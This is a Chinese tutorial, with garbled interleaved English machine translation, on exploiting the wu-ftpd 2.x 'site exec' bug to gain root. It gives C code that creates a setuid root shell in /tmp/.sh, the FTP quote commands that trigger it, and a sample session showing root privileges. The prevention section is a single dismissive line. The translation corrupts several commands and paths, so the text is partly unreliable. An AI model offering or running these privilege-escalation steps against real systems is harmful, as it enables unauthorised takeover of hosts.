如何使用wu-ftp 2.x(site exec bug)来取得root权限 How to use wu-ftp 2.x (site exec bug) to gain root privileges

1 Requirements:

(1)该主机的ftpd 使用wu-ftp 2.x 版本 (1) the host ftpd to use wu-ftp 2.x version
(2)您必须有该主机的任何一个帐号 (2) You must have an account in any of the host


2.步骤: 2 steps:

(1)先telnet login 到主机您的目录下... (1) to host your first telnet login directory ...
(2)使用cc -o bug bug.c 将下列程式编译... (2) cc-o bug bug.c compile the following program ...

--< bug.c >----------------------------- - -----------------------------

#include # Include
#include # Include
#include # Include

main() main ()
{ {
seteuid(0); seteuid (0);
system("cp /bin/sh /tmp/.sh"); system ("cp / bin / sh / tmp / .sh");
system("chmod 6777 /tmp/.sh"); system ("chmod 6777 / tmp / .sh");
} }

----------------------------------------- -----------------------------------------
编译成功後会在您的目录下产生bug 这个档案(别忘了chmod ...) After successful compilation of the directory in your file the bug in this (do not forget to chmod ...)

(3)使用ftp login 到该主机下... (3) to the host using ftp login under ...

220 hackerforce FTP server (Version wu-2.4(1) Sun Jul 31 21:00:15 220 hackerforce FTP server (Version wu-2.4 (1) Sun Jul 31 21:00:15
CDT 1997) ready. CDT 1997) ready.
Name (hackerforce:ftp): funky Name (hackerforce: ftp): funky
331 Password required for funky. 331 Password required for funky.
Password: (password) Password: (password)
230 User funky logged in. 230 User funky logged in.
Remote system type is UNIX. Remote system type is UNIX.
Using binary mode to transfer files. Using binary mode to transfer files.
ftp> quote "site exec bash -c id" (检查系统是否能利用此bug) ftp> quote "site exec bash-c id" (check whether the system can take advantage of this bug)
200-bash -c id 200-bash-c id
200-uid=0(root) gid=0(root) euid=101(funky) egid=50(users) 200-uid = 0 (root) gid = 0 (root) euid = 101 (funky) egid = 50 (users)
groups=50(users) groups = 50 (users)
200 (end of 'bash -c id') (一但出现uid=0 就成功了) 200 (end of 'bash-c id') (uid = 0 Once there is successful)
ftp> quote "site exec bash -c /yer/home/dir/ftpbug" (执行您刚编译成功的bug) ftp> quote "site exec bash-c / yer / home / dir / ftpbug" (you just build a successful implementation bug)
200-bash -c /your/home/dir/bug 200-bash-c / your / home / dir / bug
200 (end of 'bash -c /your/home/dir/bug') 200 (end of 'bash-c / your / home / dir / bug')
ftp> quit (离开ftp) ftp> quit (to leave ftp)
221 Goodbye. 221 Goodbye.

(4)再telnet 进去该主机,执行/tmp/.sh 这个setuid root shell ... (4) and then telnet into the host, execute / tmp / .sh the setuid root shell ...

$ id $ Id
uid=101(funky) gid=50(user) uid = 101 (funky) gid = 50 (user)
$ /tmp/.sh $ / Tmp / .sh

# id # Id
uid=101(funky) gid=50(user) euid=0(root) uid = 101 (funky) gid = 50 (user) euid = 0 (root)
# #

恭喜您...到此您就成功的拿到root 权限了.... Congratulations on your success ... this you had to get root privileges ....

3.後记: 3 Postscript:
由於wu-ftpd 执行时的uid 是root ,所以我们透过这个hole 来执行执行外部的命令....当编译完的bug As the wu-ftpd implementation of the uid is root, so we execute through this hole to run an external command .... When the bug compiled
一但被执行,便会帮您将/bin/sh 这个shell 复制一份到/tmp/.sh 下,并且会将/tmp/.sh setuid Once executed, it will help you to / bin / sh shell copy this to / tmp / .sh the next, and will be / tmp / .sh setuid
,一但成功後只要任何使用者执行/tmp/.sh 这个setuid shell 就会拥有root 的euid .... , A long but successful implementation of any user / tmp / .sh the setuid shell will have root euid ....

4.防范 4 against
为什么会成功，怎样防范，漏洞在那里呢？ Why is success, how to prevent, loopholes in there? 用户为什么会有TELNET的权限，为什么能够运行CC编译程序！ Why TELNET user permissions, why can run the CC compiler! ......在公布的系统BUG中，已经有解决此类问题的方案和PATCH，自己去找吧！ ...... In the published system BUG, ​​has a program to solve such problems and PATCH, their own to find it!